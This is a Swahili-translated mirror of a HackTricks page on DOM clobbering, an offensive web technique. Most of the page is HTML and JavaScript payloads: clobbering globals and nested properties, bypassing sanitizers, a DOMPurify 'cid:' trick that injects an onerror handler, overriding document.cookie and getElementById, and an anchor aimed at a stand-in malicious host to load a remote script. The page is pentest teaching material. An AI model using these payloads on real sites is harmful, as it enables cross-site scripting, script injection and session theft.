Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

219 lines
12 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Dom Clobbering
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## **Misingi**
Inawezekana kuzalisha **variables za kikoa za kawaida ndani ya muktadha wa JS** kwa kutumia sifa **`id`** na **`name`** kwenye vitambulisho vya HTML.
```html
<form id=x></form>
<script> console.log(typeof document.x) //[object HTMLFormElement] </script>
```
**Ni** vipengele **fulani tu** vinavyoweza kutumia **sifa ya jina** kuathiri globals, ni: `embed`, `form`, `iframe`, `image`, `img` na `object`.
Kwa kushangaza, unapotumia kipengele cha **fomu** kuathiri kipengele, utapata thamani ya **`toString`** ya kipengele lenyewe: `[object HTMLFormElement]` lakini na **kiungo** cha **`toString`** itakuwa **`href`** ya kiungo. Kwa hiyo, ikiwa unatumia **tag ya `a`**, unaweza **kudhibiti** **thamani** wakati inachukuliwa kama **herufi**:
```html
<a href="controlled string" id=x></a>
<script>
console.log(x);//controlled string
</script>
```
### Mafurushi na Vipengele
Pia ni **inawezekana kuchafua mafurushi** na **vipengele vya vitu**:
```html
<a id=x>
<a id=x name=y href=controlled>
<script>
console.log(x[1])//controlled
console.log(x.y)//controlled
</script>
```
Kwa kufuta **sifa ya 3** (kwa mfano x.y.z), unahitaji kutumia **`form`**:
```html
<form id=x name=y><input id=z value=controlled></form>
<form id=x></form>
<script>
alert(x.y.z.value)//controlled
</script>
```
Kuweka alama zaidi ni **ngumu zaidi lakini bado inawezekana**, kwa kutumia iframes:
```html
<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
<style>@import 'https://google.com';</style>
<script>alert(x.y)//controlled</script>
```
{% hint style="warning" %}
Tagi ya mtindo hutumiwa kutoa muda wa kutosha kwa kiolesura cha iframe kuonyesha. Bila hiyo, utapata onyo la "isiyofafanuliwa".
{% endhint %}
Ili kufunika sifa za kina zaidi, unaweza kutumia **iframes na uandishi wa HTML** kwa njia hii:
```html
<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>@import 'https://google.com';</style>
<script>
alert(a.b.c.d.e)//controlled
</script>
```
### **Kuvuka Kichujio**
Ikiwa kichujio kinapitia mali za kipengee kwa kutumia kitu kama `document.getElementByID('x').attributes`, unaweza **kuvuka** mali ya **`.attributes`** na **kuvunja kichujio**. Mali nyingine za DOM kama **`tagName`**, **`nodeName`** au **`parentNode`** na zingine zinaweza pia **kuvukwa**.
```html
<form id=x></form>
<form id=y>
<input name=nodeName>
</form>
<script>
console.log(document.getElementById('x').nodeName)//FORM
console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
</script>
```
## **Kuweka `window.someObject`**
Katika JavaScript ni kawaida kupata:
```javascript
var someObject = window.someObject || {};
```
Kuathiri HTML kwenye ukurasa kunaruhusu kubadilisha `someObject` na kipengele cha DOM, kinachoweza kuleta udhaifu wa usalama. Kwa mfano, unaweza kubadilisha `someObject` na kipengele cha kiungo kinachoelekeza kwenye hati ya kudhuru:
```html
<a id=someObject href=//malicious-website.com/malicious.js></a>
```
Katika kificho kinachoweza kudhurika kama:
```html
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
```
Mbinu hii inatumia chanzo cha skripti kuendesha nambari isiyo hitajika.
**Hila**: **`DOMPurify`** inakuwezesha kutumia itifaki ya **`cid:`**, ambayo **haitoi URL-encode alama za nukuu mara mbili**. Hii inamaanisha unaweza **kuingiza alama ya nukuu iliyofichwa ambayo itadecode wakati wa runtime**. Kwa hivyo, kuingiza kitu kama **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** kutafanya HTML encoded `&quot;` **idecode wakati wa runtime** na **kutoroka** kutoka kwa thamani ya sifa ili **kuunda** tukio la **`onerror`**.
Tekniki nyingine inatumia kipengele cha **`form`**. Maktaba fulani za upande wa mteja huchunguza sifa za kipengele cha fomu kilichoundwa hivi karibuni ili kuzisafisha. Walakini, kwa kuongeza `input` na `id=attributes` ndani ya fomu, unaweza kubadilisha mali ya sifa, kuzuia sanitizer kufikia sifa halisi.
Unaweza [**kupata mfano wa aina hii ya clobbering katika hii CTF writeup**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
## Kuchafua kipengele cha hati
Kulingana na nyaraka, ni rahisi kubadilisha sifa za kipengele cha hati kwa kutumia DOM Clobbering:
> Kiolesura cha [Hati](https://html.spec.whatwg.org/multipage/dom.html#document) [kinasaidia mali zilizo na majina](https://webidl.spec.whatwg.org/#dfn-support-named-properties). Majina ya mali yaliyosaidiwa ya kipengele cha [Hati](https://html.spec.whatwg.org/multipage/dom.html#document) wakati wowote yanajumuisha yafuatayo, kwa [mpangilio wa mti](https://dom.spec.whatwg.org/#concept-tree-order) kulingana na kipengele kilichochangia, ikipuuza nakala zinazofuata, na na thamani kutoka kwa sifa za [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) zinazokuja kabla ya thamani kutoka kwa sifa za jina wakati kipengele kimoja kinachangia vyote viwili:
>
> \- Thamani ya sifa ya yaliyomo ya jina kwa vifaa vyote vilivyofichuliwa vya [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), na vifaa vilivyofichuliwa vya [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) ambavyo vina sifa ya yaliyomo ya jina isiyo tupu na viko [katika mti wa hati](https://dom.spec.whatwg.org/#in-a-document-tree) na hati kama [mizizi](https://dom.spec.whatwg.org/#concept-tree-root) yao;\
> \
> \- Thamani ya sifa ya yaliyomo ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) kwa vifaa vyote vilivyofichuliwa vya [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) ambavyo vina sifa ya yaliyomo ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) isiyo tupu na viko [katika mti wa hati](https://dom.spec.whatwg.org/#in-a-document-tree) na hati kama [mizizi](https://dom.spec.whatwg.org/#concept-tree-root) yao;\
> \
> \- Thamani ya sifa ya yaliyomo ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) kwa vifaa vyote vya [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) ambavyo vina sifa ya yaliyomo ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) isiyo tupu na sifa ya yaliyomo ya jina isiyo tupu, na viko [katika mti wa hati](https://dom.spec.whatwg.org/#in-a-document-tree) na hati kama [mizizi](https://dom.spec.whatwg.org/#concept-tree-root).
Kwa kutumia mbinu hii, unaweza kubadilisha **thamani za kawaida kama `document.cookie`, `document.body`, `document.children`**, na hata njia katika kiolesura cha Hati kama `document.querySelector`.
```javascript
document.write("<img name=cookie />")
document.cookie
<img name="cookie">
typeof(document.cookie)
'object'
//Something more sanitize friendly than a img tag
document.write("<form name=cookie><input id=toString></form>")
document.cookie
HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)
'object
```
## Kuandika baada ya kufuta kipengele
Matokeo ya wito wa **`document.getElementById()`** na **`document.querySelector()`** yanaweza kubadilishwa kwa kuingiza lebo ya `<html>` au `<body>` na sifa sawa ya kitambulisho. Hapa ndipo jinsi inavyoweza kufanywa:
```html
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
<html id="cdnDomain" class="x">clobbered</html>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
alert(document.querySelector('.x').innerText); // Clobbered
</script>
```
Zaidi ya hayo, kwa kutumia mitindo kuificha HTML/injini za mwili zilizoingizwa hizi, kuingiliwa na maandishi mengine katika `innerText` kunaweza kuzuiwa, hivyo kuongeza ufanisi wa shambulio:
```html
<div style="display:none" id="cdnDomain">test</div>
<p>existing text</p>
<html id="cdnDomain">clobbered</html>
<style>
p{display:none;}
</style>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
Uchunguzi katika SVG ulifunua kuwa lebo ya `<body>` inaweza kutumiwa kwa ufanisi:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg><body id="cdnDomain">clobbered</body></svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
Kwa lebo ya HTML kufanya kazi ndani ya SVG kwenye vivinjari kama Chrome na Firefox, lebo ya `<foreignobject>` ni muhimu:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<foreignobject>
<html id="cdnDomain">clobbered</html>
</foreignobject>
</svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
## Kuziba Fomu
Inawezekana kuongeza **vipengele vipya ndani ya fomu** kwa tu **kutaja sifa ya `form`** ndani ya baadhi ya vitambulisho. Unaweza kutumia hii kuongeza **thamani mpya ndani ya fomu** na hata kuongeza **kitufe** kipya cha **kupeleka** (clickjacking au kutumia baadhi ya msimbo wa JS wa `.click()`):
{% code overflow="wrap" %}
```html
<!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info>
";alert(1);//
</textarea>
<button form=id-other-form type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
```
{% endcode %}
* Kwa aina zaidi ya fomu katika [**kitufe hiki**](https://www.w3schools.com/tags/tag\_button.asp)**.**
## Marejeo
* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
* [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
* Heyes, Gareth. JavaScript kwa wadukuzi: Jifunze kufikiri kama mdukuzi.
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Reference in a new issue View git blame Copy permalink